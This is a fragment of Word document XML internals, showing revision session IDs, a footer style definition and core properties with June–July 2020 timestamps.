    <w:rsid w:val="0085699D"/>
    <w:rsid w:val="008A3438"/>
    <w:rsid w:val="008D4961"/>
    <w:rsid w:val="00962CA1"/>
    <w:rsid w:val="0098129E"/>
    <w:rsid w:val="00A10E04"/>
    <w:rsid w:val="00BB59C1"/>
    <w:rsid w:val="00D439DD"/>
    <w:rsid w:val="00F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95823"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2B1344A5-6746-468D-A27A-6A8CDC26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9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59C1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB5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9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-29T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-03T21:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>